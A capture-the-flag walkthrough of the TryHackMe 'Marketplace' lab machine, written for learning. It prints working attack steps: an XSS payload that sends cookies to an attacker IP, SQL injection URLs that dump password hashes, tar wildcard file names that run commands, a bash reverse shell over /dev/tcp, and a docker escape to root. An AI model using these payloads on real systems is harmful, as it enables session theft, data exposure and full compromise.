CTF Walkthroughs, TryHackMe

TryHackMe – The Marketplace Walkthrough

Introduction

This was an intermediate Linux machine that involved exploiting a stored cross-site scripting vulnerability and a SQL injection vulnerability to gain initial access, then abusing a misconfigured sudo rule (a tar wildcard in a backup script) and docker group membership to escalate privileges to root.

Enumeration

The first step is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate applications versions

The scan identified three open ports: 22 (SSH), 80 (HTTP) and 32768 (a Node.js HTTP service). The next step is to enumerate HTTP.

Enumerating HTTP

When visiting the web server through a browser, the following page appears:

The site allows users to sign up, signing up as “stef”:

Logging into the site with the newly created user:

Navigating back to the home page:

It appears the admin page cannot be accessed as a normal user:

The site uses JSON Web Tokens (JWT) for sessions. Decoding the token's payload shows the "admin" claim set to false, which is probably why the admin page cannot be accessed:

The site has a way for users to add listings:

When creating one, the site mentions the admins will review them manually:

The box probably has a scheduled task that simulates an admin user visiting newly added listings, so stored cross-site scripting could be used to steal that user's session token. Testing a simple alert payload first:

When visiting the listing, the payload is triggered:

Setting up a Python Simple HTTP Server to receive the admin session token:

Creating a new listing with the following XSS payload, which sends the viewing user's cookie to the attacker's web server as a query parameter:

<script>document.write('<img src="http://10.4.36.186?c='+document.cookie+'" />');</script>

The request containing the admin JWT token was received:

The token belongs to the user Michael, who is an administrator:
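The following script is an added example rather than code from the walkthrough. It does both halves of this step offline: it pulls the exfiltrated cookie out of an access-log line of the kind the Python HTTP server prints, and decodes the JWT payload so the admin claim can be read without knowing the signing key. It assumes the session cookie is named token (the page does not show the cookie name) and that the XSS payload put it in the c query parameter; the token and the log line are constructed here, not captured from the room.

```shell
#!/bin/bash
# Added example (not the room's code). Reads the exfiltrated cookie out of the
# Python http.server access log and decodes the JWT's claims. Assumptions: the
# session cookie is named "token" and the XSS payload sent it as the "c" query
# parameter; the token and log line below are constructed, not a real capture.

# base64url -> base64: swap the alphabet back and restore the stripped padding.
b64url_decode() {
    local s
    s="$(printf '%s' "$1" | tr -- '-_' '+/')"
    case $(( ${#s} % 4 )) in
        2) s="$s==" ;;
        3) s="$s=" ;;
    esac
    printf '%s' "$s" | base64 -d
}

# Encoder used only to build the sample token; real tokens come from the target.
b64url_encode() {
    printf '%s' "$1" | base64 | tr -d '=\n' | tr -- '+/' '-_'
}

# The second dot-separated segment of a JWT is the payload (claims). It is only
# base64url-encoded, never encrypted, so whoever holds the token can read it.
jwt_payload() {
    b64url_decode "$(printf '%s' "$1" | cut -d. -f2)"
}

# Crude single-claim extraction; enough for a scalar such as admin:true/false.
jwt_claim() {
    jwt_payload "$1" | sed -n "s/.*\"$2\":\([^,}]*\).*/\1/p"
}

# Pull the value of ?c= out of a line like the one SimpleHTTPServer logs.
cookie_from_log() {
    printf '%s\n' "$1" | sed -n 's/.*GET \/?c=\([^ ]*\) HTTP.*/\1/p'
}

# Constructed sample token carrying the claim the room's admin token had.
SAMPLE_TOKEN="$(b64url_encode '{"alg":"HS256","typ":"JWT"}').$(b64url_encode '{"username":"michael","admin":true}').fakesignature"
SAMPLE_LOG="10.10.129.25 - - [01/Jan/2021 12:00:00] \"GET /?c=token=$SAMPLE_TOKEN HTTP/1.1\" 200 -"

cookie="$(cookie_from_log "$SAMPLE_LOG")"   # token=eyJ...
jwt_claim "${cookie#token=}" admin           # prints: true
```

The padding step is the part that usually trips people up: JWT segments drop the trailing = characters, so a plain base64 -d fails on roughly two thirds of tokens until the length is rounded back up to a multiple of four.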

Manually replacing the current token with Michael’s:

When refreshing the page, the administration panel is now available:

When accessing it, the first flag is found:

When clicking on a user, the URL contains a 'user' parameter, which might be vulnerable to SQL injection:

This can be verified by appending a single quote to the parameter value, which generates a MySQL error:

Exploiting SQL Injection

The number of columns returned by the original query can be found with an ORDER BY clause: ordering by column 5 errors out while 4 works, so the query returns four columns:

http://10.10.129.25/admin?user=1 order by 5--

Listing the tables in the marketplace database (the closing quote of the string literal is needed, otherwise MySQL reports a syntax error):

http://10.10.129.25/admin?user=123%20union%20SELECT%20group_concat(table_name),2,3,4%20FROM%20information_schema.tables%20WHERE%20table_schema%20=%27marketplace%27

Enumerating the columns of the users table:

http://10.10.129.25/admin?user=123%20union%20SELECT%20group_concat(column_name),2,3,4%20from%20information_schema.columns%20where%20table_schema%20=%20database()%20and%20table_name%20=%27users%27

Dumping usernames and password hashes from the users table:

http://10.10.129.25/admin?user=123%20union%20SELECT%20group_concat(username,0x3a,password),2,3,4%20from%20users

These hashes could not be cracked, so another table has to be looked at.

Listing the columns of the messages table:

http://10.10.129.25/admin?user=123%20union%20SELECT%20group_concat(column_name),2,3,4%20from%20information_schema.columns%20where%20table_schema%20=%20database()%20and%20table_name%20=%27messages%27

Listing the messages, one of which contains a password:

http://10.10.129.25/admin?user=123%20union%20SELECT%20group_concat(id,0x3a,is_read,0x3a,message_content,0x3a,user_from,0x3a,user_to%20),2,3,4%20from%20messages

The message was sent to user id 3, which is jake. Logging in as him:

Escalating to Michael User

When executing sudo -l, it appears the current user can execute /opt/backups/backup.sh as the michael user:

The script archives the contents of a directory with tar, passing a wildcard (*) as the list of files to include:

Upon consulting GTFOBins, it appears tar can be abused when run through sudo. Tar has a --checkpoint option, which displays a progress message every time a given number of records has been archived, and a companion --checkpoint-action option, which runs an action (such as executing a binary or script) whenever a checkpoint is reached.

Because the script passes a wildcard, the shell expands * to every file name in /var/www/html and tar receives those names as arguments, options included. Creating a file named --checkpoint=1 (to trigger a checkpoint on every record) and a file named --checkpoint-action=exec=bash stef.sh (to specify the command to run) is therefore enough to have tar execute that command as michael. More details on the exploit are available below:

Executing the following commands to create the two files whose names tar will parse as arguments (as in the GTFOBins example above):

touch "/var/www/html/--checkpoint-action=exec=bash stef.sh"
touch "/var/www/html/--checkpoint=1"

Creating a Bash script that will run a reverse shell back to the local Kali box, and making it executable:

#!/bin/bash
bash -i >& /dev/tcp/10.4.36.186/443 0>&1

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup

Running the backup script as michael, which makes tar pick up the two file names as options and execute the reverse shell:

sudo -u michael ./backup.sh
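As an added example that is not part of the original walkthrough, the following script reproduces the wildcard injection locally and without sudo, so the mechanism can be verified before relying on it against the target. It assumes GNU tar (bsdtar has no --checkpoint option); pwn.sh and the marker file are stand-ins for the reverse-shell script, and the directory names are made up here.

```shell
#!/bin/bash
# Added example (not the room's backup.sh): reproduce the tar wildcard trick
# locally, without sudo, to confirm the mechanism before using it on the target.
# Assumes GNU tar (bsdtar has no --checkpoint option). pwn.sh and the marker
# file are stand-ins for the reverse-shell script.

wildcard_demo() {
    local work marker
    work="$(mktemp -d)" || return 1
    marker="$work/marker"            # exists afterwards only if pwn.sh ran
    mkdir "$work/src"

    (
        cd "$work/src" || exit 1
        printf 'legit data\n' > data.txt                    # something real to archive
        printf '#!/bin/sh\ntouch "%s"\n' "$marker" > pwn.sh  # stand-in for the reverse shell

        # The file *names* are the payload. When the script's `tar cf ... *`
        # expands the glob, these become `--checkpoint=1` and
        # `--checkpoint-action=exec=sh pwn.sh` on tar's command line, and GNU
        # tar accepts options anywhere in argv, not just before the file list.
        touch -- '--checkpoint=1'
        touch -- '--checkpoint-action=exec=sh pwn.sh'

        # What a backup script of the form `tar cf backup.tar *` effectively runs.
        # The archive lives outside src/ so it is not archived into itself.
        tar cf "$work/backup.tar" *
    )

    local rc=1
    if [ -e "$marker" ]; then rc=0; fi    # the checkpoint action fired
    rm -rf "$work"
    return "$rc"
}

wildcard_demo && echo "checkpoint action executed: tar ran our command"
```

The command in the checkpoint action runs with tar's working directory and privileges, which is why the room's backup script, executed as michael through sudo, yields a shell as michael rather than as the invoking user.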

The following steps can be done to obtain a fully interactive shell:

  • Running python -c 'import pty; pty.spawn("/bin/sh")' on the victim host
  • Hitting CTRL+Z to background the process and return to the local host
  • Running stty raw -echo on the local host
  • Typing fg and pressing ENTER to return to the reverse shell

Escalating to Root

Transferring the LinPEAS enumeration script using the Python Simple HTTP Server and wget:

Executing the script:

It appears the “michael” user is part of the docker group:

Members of the docker group can talk to the Docker daemon, which runs as root, so a container can be started with the host's root filesystem bind-mounted inside it and then chrooted into. Listing the locally available images and running a container from the alpine image:

docker image ls
docker run -it --rm -v /:/mnt alpine chroot /mnt bash

This gives a root shell on the host's filesystem, and with it full control of the machine.

Conclusion

This was a very cool CTF as it did a great job at emulating a real-life vulnerable application and demonstrating the full chain of exploits that can lead to a full system compromise.